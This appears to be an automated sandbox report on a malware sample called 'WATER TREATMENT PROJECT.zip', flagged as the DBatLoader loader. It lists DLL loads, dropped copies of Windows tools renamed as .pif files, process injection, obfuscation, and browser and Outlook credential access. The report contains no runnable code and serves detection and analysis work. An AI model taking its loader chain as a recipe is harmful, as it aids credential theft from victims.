Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sti.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\Public\expha.pif Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\Public\expha.pif Section loaded: cabinet.dll
Source: C:\Users\Public\expha.pif Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: pstorec.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: pstorec.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\recover.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\ghf.pif Section loaded: certcli.dll
Source: C:\Users\Public\ghf.pif Section loaded: cabinet.dll
Source: C:\Users\Public\ghf.pif Section loaded: cryptui.dll
Source: C:\Users\Public\ghf.pif Section loaded: certca.dll
Source: C:\Users\Public\ghf.pif Section loaded: cryptsp.dll
Source: C:\Users\Public\ghf.pif Section loaded: ncrypt.dll
Source: C:\Users\Public\ghf.pif Section loaded: netapi32.dll
Source: C:\Users\Public\ghf.pif Section loaded: ntdsapi.dll
Source: C:\Users\Public\ghf.pif Section loaded: version.dll
Source: C:\Users\Public\ghf.pif Section loaded: secur32.dll
Source: C:\Users\Public\ghf.pif Section loaded: samcli.dll
Source: C:\Users\Public\ghf.pif Section loaded: logoncli.dll
Source: C:\Users\Public\ghf.pif Section loaded: dsrole.dll
Source: C:\Users\Public\ghf.pif Section loaded: netutils.dll
Source: C:\Users\Public\ghf.pif Section loaded: sspicli.dll
Source: C:\Users\Public\ghf.pif Section loaded: ntasn1.dll
Source: C:\Users\Public\ghf.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\ghf.pif Section loaded: profapi.dll
Source: C:\Users\Public\ghf.pif Section loaded: certcli.dll
Source: C:\Users\Public\ghf.pif Section loaded: cabinet.dll
Source: C:\Users\Public\ghf.pif Section loaded: cryptui.dll
Source: C:\Users\Public\ghf.pif Section loaded: ncrypt.dll
Source: C:\Users\Public\ghf.pif Section loaded: netapi32.dll
Source: C:\Users\Public\ghf.pif Section loaded: ntdsapi.dll
Source: C:\Users\Public\ghf.pif Section loaded: certca.dll
Source: C:\Users\Public\ghf.pif Section loaded: cryptsp.dll
Source: C:\Users\Public\ghf.pif Section loaded: version.dll
Source: C:\Users\Public\ghf.pif Section loaded: secur32.dll
Source: C:\Users\Public\ghf.pif Section loaded: samcli.dll
Source: C:\Users\Public\ghf.pif Section loaded: logoncli.dll
Source: C:\Users\Public\ghf.pif Section loaded: dsrole.dll
Source: C:\Users\Public\ghf.pif Section loaded: netutils.dll
Source: C:\Users\Public\ghf.pif Section loaded: sspicli.dll
Source: C:\Users\Public\ghf.pif Section loaded: ntasn1.dll
Source: C:\Users\Public\ghf.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\ghf.pif Section loaded: profapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\Public\rdha.pif Section loaded: zipfldr.dll
Source: C:\Users\Public\rdha.pif Section loaded: propsys.dll
Source: C:\Users\Public\rdha.pif Section loaded: uxtheme.dll
Source: C:\Users\Public\rdha.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\rdha.pif Section loaded: wldp.dll
Source: C:\Users\Public\rdha.pif Section loaded: kernel.appcore.dll
Source: C:\Users\Public\rdha.pif Section loaded: profapi.dll
Source: C:\Users\Public\rdha.pif Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\rdha.pif Section loaded: edputil.dll
Source: C:\Users\Public\rdha.pif Section loaded: urlmon.dll
Source: C:\Users\Public\rdha.pif Section loaded: iertutil.dll
Source: C:\Users\Public\rdha.pif Section loaded: srvcli.dll
Source: C:\Users\Public\rdha.pif Section loaded: netutils.dll
Source: C:\Users\Public\rdha.pif Section loaded: sspicli.dll
Source: C:\Users\Public\rdha.pif Section loaded: wintypes.dll
Source: C:\Users\Public\rdha.pif Section loaded: appresolver.dll
Source: C:\Users\Public\rdha.pif Section loaded: bcp47langs.dll
Source: C:\Users\Public\rdha.pif Section loaded: slc.dll
Source: C:\Users\Public\rdha.pif Section loaded: userenv.dll
Source: C:\Users\Public\rdha.pif Section loaded: sppc.dll
Source: C:\Users\Public\rdha.pif Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\rdha.pif Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: version.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: uxtheme.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: url.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ieframe.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: iertutil.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: netapi32.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: userenv.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winhttp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: wkscli.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: netutils.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: windows.storage.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: wldp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: kernel.appcore.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: propsys.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: amsi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winmm.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: wininet.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sspicli.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: profapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: mswsock.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: iphlpapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winnsi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ????.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??????????.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ???.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ????.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sppc.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: tquery.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: cryptdll.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: spp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sppwmi.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: slc.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: sppcext.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: winscard.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: devobj.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: cryptsp.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: rsaenh.dll
Source: C:\Users\Public\ANYDESK.PIF Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: atlthunk.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: mmdevapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: ksuser.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: avrt.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: audioses.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: midimap.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\rdha.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\colorcpl.exe Window detected: Number of UI elements: 12
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: WATER TREATMENT PROJECT.zip Static file information: File size 4183698 > 1048576
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source: Binary string: extrac32.pdb source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr
Source: Binary string: rundll32.pdb source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source: Binary string: rundll32.pdbGCTL source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source: Binary string: certutil.pdb source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source: Binary string: cmd.pdb source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source: Binary string: easinvoker.pdbGCTL source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.00000000009EB000.00000004.00000020.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: certutil.pdbGCTL source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source: Binary string: extrac32.pdbGCTL source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr

Data Obfuscation
barindex
Yara detected DBatLoader
Source: Yara match File source: 26.2.ANYDESK.PIF.256fc48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.ANYDESK.PIF.256fc48.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.ANYDESK.PIF.2b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.1844718324.000000000256F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Binary contains a suspicious time stamp
Source: expha.pif.15.dr Static PE information: 0xF4B59DD8 [Fri Feb 5 20:38:48 2100 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B13E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 26_2_02B13E20
PE file contains sections with non-standard names
Source: alpha.pif.16.dr Static PE information: section name: .didat
Source: rdha.pif.17.dr Static PE information: section name: .didat
Source: ghf.pif.18.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B262A4 push 02B2630Fh; ret 26_2_02B26307
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B03210 push eax; ret 26_2_02B0324C
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B260AC push 02B26125h; ret 26_2_02B2611D
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1A018 push ecx; mov dword ptr [esp], edx 26_2_02B1A01D
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1606B push 02B160A4h; ret 26_2_02B1609C
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B1606C push 02B160A4h; ret 26_2_02B1609C
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B261F8 push 02B26288h; ret 26_2_02B26280
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0617A push 02B061BEh; ret 26_2_02B061B6
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0617C push 02B061BEh; ret 26_2_02B061B6
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B26144 push 02B261ECh; ret 26_2_02B261E4
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0F600 push 02B0F64Dh; ret 26_2_02B0F645
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0C493 push 02B0C61Eh; ret 26_2_02B0C616
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0C498 push 02B0C61Eh; ret 26_2_02B0C616
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0F4F4 push 02B0F56Ah; ret 26_2_02B0F562
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B12410 push ecx; mov dword ptr [esp], edx 26_2_02B12412
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0F5FF push 02B0F64Dh; ret 26_2_02B0F645
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B25854 push 02B25A3Ah; ret 26_2_02B25A32
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B12EDA push 02B12F87h; ret 26_2_02B12F7F
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B12EDC push 02B12F87h; ret 26_2_02B12F7F
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0BE18 push ecx; mov dword ptr [esp], edx 26_2_02B0BE1D
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B19FB4 push ecx; mov dword ptr [esp], edx 26_2_02B19FB9
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B13F84 push 02B13FBCh; ret 26_2_02B13FB4
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B05DA0 push 02B05DFBh; ret 26_2_02B05DF3
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B05D9E push 02B05DFBh; ret 26_2_02B05DF3
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B0CDE0 push 02B0CE0Ch; ret 26_2_02B0CE04
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B13D40 push 02B13D82h; ret 26_2_02B13D7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05362806 push ecx; ret 35_2_05362819
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00446B75 push ecx; ret 47_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00452BB4 push eax; ret 47_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044DDB0 push eax; ret 47_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0044DDB0 push eax; ret 47_2_0044DDEC

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\rdha.pif Jump to dropped file
Source: C:\Users\Public\ANYDESK.PIF File created: C:\Users\user\Links\Kaitdipg.PIF Jump to dropped file
Source: C:\Users\Public\ghf.pif File created: C:\Users\Public\ANYDESK.PIF Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\expha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\ghf.pif Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004062E2 ShellExecuteW,URLDownloadToFileW, 62_2_004062E2
Drops PE files
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\rdha.pif Jump to dropped file
Source: C:\Users\Public\ANYDESK.PIF File created: C:\Users\user\Links\Kaitdipg.PIF Jump to dropped file
Source: C:\Users\Public\ghf.pif File created: C:\Users\Public\ANYDESK.PIF Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\expha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\ghf.pif Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\rdha.pif Jump to dropped file
Source: C:\Users\Public\ghf.pif File created: C:\Users\Public\ANYDESK.PIF Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\expha.pif Jump to dropped file
Source: C:\Users\Public\expha.pif File created: C:\Users\Public\ghf.pif Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
